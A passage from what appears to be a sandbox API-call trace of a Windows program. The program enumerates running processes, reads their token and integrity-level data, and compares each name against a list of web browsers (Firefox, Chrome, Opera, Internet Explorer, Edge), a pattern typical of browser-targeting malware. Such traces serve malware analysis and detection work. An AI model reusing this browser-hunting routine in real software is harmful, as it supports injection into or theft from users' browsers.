dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0496.593] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0496.593] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0496.593] GetLastError () returned 0x7a [0496.593] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0496.593] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0496.593] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0496.593] CloseHandle (hObject=0x3bc) returned 1 [0496.593] CloseHandle (hObject=0x5a4) returned 1 [0496.593] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0496.593] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0496.593] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0496.593] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0496.593] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0496.593] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0496.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0496.593] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0496.593] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0496.593] GetLastError () returned 0x7a [0496.593] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0496.593] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0496.593] CloseHandle (hObject=0x3bc) returned 1 [0496.593] CloseHandle (hObject=0x5a4) returned 1 [0496.593] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0496.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0496.594] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x3762a0, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\x9f") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0496.594] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0496.594] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0496.594] GetLastError () returned 0x7a [0496.594] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0496.594] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0496.594] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0496.594] CloseHandle (hObject=0x3bc) returned 1 [0496.594] CloseHandle (hObject=0x5a4) returned 1 [0496.594] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0496.594] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0496.594] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0496.594] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0496.594] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0496.594] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0496.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0496.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0496.594] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0496.594] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0496.594] GetLastError () returned 0x7a [0496.594] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0496.594] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0496.594] CloseHandle (hObject=0x3bc) returned 1 [0496.594] CloseHandle (hObject=0x5a4) returned 1 [0496.594] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0496.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0496.594] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x3768e8, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\"> ") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0496.594] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0496.594] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0496.594] GetLastError () returned 0x7a [0496.594] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0496.594] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0496.594] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0496.594] CloseHandle (hObject=0x3bc) returned 1 [0496.594] CloseHandle (hObject=0x5a4) returned 1 [0496.594] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0496.594] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0496.594] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0496.594] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0496.595] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0496.595] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0496.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0496.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0496.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0496.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0496.595] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0496.595] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0496.595] GetLastError () returned 0x7a [0496.595] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0496.595] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0496.595] CloseHandle (hObject=0x3bc) returned 1 [0496.595] CloseHandle (hObject=0x5a4) returned 1 [0496.595] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0496.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0496.595] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376c90, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">¡") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0496.595] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0496.595] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0496.595] GetLastError () returned 0x7a [0496.595] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0496.595] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0496.595] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0496.595] CloseHandle (hObject=0x3bc) returned 1 [0496.595] CloseHandle (hObject=0x5a4) returned 1 [0496.595] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0496.595] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0496.595] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0496.595] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0496.595] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0496.595] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0496.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0496.595] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0496.596] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0498.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa388) returned 0xc0000004 [0498.599] VirtualAlloc (lpAddress=0x0, dwSize=0xb388, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0498.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb388, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0498.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0498.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0498.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0498.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0498.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0498.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0498.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0498.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0498.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0498.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0498.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0498.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0498.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0498.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0498.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0498.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0498.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0498.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0498.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0498.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0498.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0498.600] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0498.600] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0498.600] GetLastError () returned 0x7a [0498.600] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0498.600] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0498.600] CloseHandle (hObject=0x3bc) returned 1 [0498.600] CloseHandle (hObject=0x5a4) returned 1 [0498.600] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0498.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0498.600] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x377da8, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">¢") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0498.600] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0498.600] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0498.600] GetLastError () returned 0x7a [0498.600] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0498.600] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0498.601] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0498.601] CloseHandle (hObject=0x3bc) returned 1 [0498.601] CloseHandle (hObject=0x5a4) returned 1 [0498.601] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0498.601] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0498.601] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0498.601] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0498.601] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0498.601] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0498.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0498.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0498.601] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0498.601] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0498.601] GetLastError () returned 0x7a [0498.601] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0498.601] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0498.601] CloseHandle (hObject=0x3bc) returned 1 [0498.601] CloseHandle (hObject=0x5a4) returned 1 [0498.601] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0498.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0498.601] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x375ae0, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">£") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0498.601] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0498.601] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0498.601] GetLastError () returned 0x7a [0498.601] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0498.601] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0498.601] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0498.601] CloseHandle (hObject=0x3bc) returned 1 [0498.601] CloseHandle (hObject=0x5a4) returned 1 [0498.601] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0498.601] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0498.601] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0498.601] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0498.601] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0498.601] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0498.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0498.601] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0498.602] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0498.602] GetLastError () returned 0x7a [0498.602] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0498.602] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0498.602] CloseHandle (hObject=0x3bc) returned 1 [0498.602] CloseHandle (hObject=0x5a4) returned 1 [0498.602] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0498.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0498.602] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x3762a0, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">¤") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0498.602] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0498.602] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0498.602] GetLastError () returned 0x7a [0498.602] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0498.602] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0498.602] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0498.602] CloseHandle (hObject=0x3bc) returned 1 [0498.602] CloseHandle (hObject=0x5a4) returned 1 [0498.602] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0498.602] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0498.602] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0498.602] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0498.602] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0498.602] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0498.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0498.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0498.602] OpenProcessToken (in: 